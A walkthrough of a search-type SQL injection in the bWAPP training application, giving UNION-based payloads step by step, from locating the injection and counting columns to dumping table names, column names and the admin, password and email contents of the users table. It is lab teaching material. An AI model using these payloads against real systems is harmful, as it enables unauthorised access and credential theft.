1. Test whether there is an injection point and, if so, what kind. In the "title=1" parameter, append a single quote and look at the result (see screenshot).
The error message contains a "%", which tells you the input lands inside a LIKE '%...%' pattern: a search-type SQL injection.
2. Enter "title=1%' and '%'='" or "title=1%' or '%'='". Neither produces an error; the "and" form returns only the matching rows, while "title=1%' or '%'='" makes the condition always true and returns every movie (see screenshot).
Now start injecting.
3. Determine the number of columns:
Enter "title=1%' order by 7--+" and the page displays normally; enter "title=1%' order by 8--+" and the page returns "Error: Unknown column '8' in 'order clause'", so the query has 7 columns (see screenshot).
The comment here is "--" rather than "#". The reason is the URL, not MySQL: "#" marks the start of the fragment, so the browser never sends it to the server and the trailing "%'" of the original query is left in place, breaking the statement. To use MySQL's "#" comment you must URL-encode it as "%23". The "+" after "--" decodes to a space, which MySQL requires after "--" for the comment to be recognised.
4. Query the database name and other information:
First find which columns are displayed by entering "title=1%' union select 1,2,3,4,5,6,7--+" (see screenshot).
Then enter "title=1%' union select 1,database(),version(),4,user(),6,7--+" to show the database name, database version and current database user in the displayed columns (see screenshot).
5. Query the table names:
Enter "title=1%' union select 1,database(),version(),table_name,user(),6,7 from information_schema.tables where table_schema='bwapp'--+" (see screenshot for the result).
Obviously the users table is the one we want.
6. Query the column names:
Enter "title=1%' union select 1,database(),version(),column_name,user(),6,7 from information_schema.columns where table_name='users'--+" (see screenshot for the result).
The users table has many columns; we focus on three of them: admin, password and email.
7. Query the contents of those columns:
Enter "title=1%' union select 1,database(),version(),group_concat(admin,'||',password,'||',email),user(),6,7 from users--+" (see screenshot for the result).
With these steps done, it is worth trying the other tables and columns yourself.
bWAPP SQL injection (search type): sqli_1.php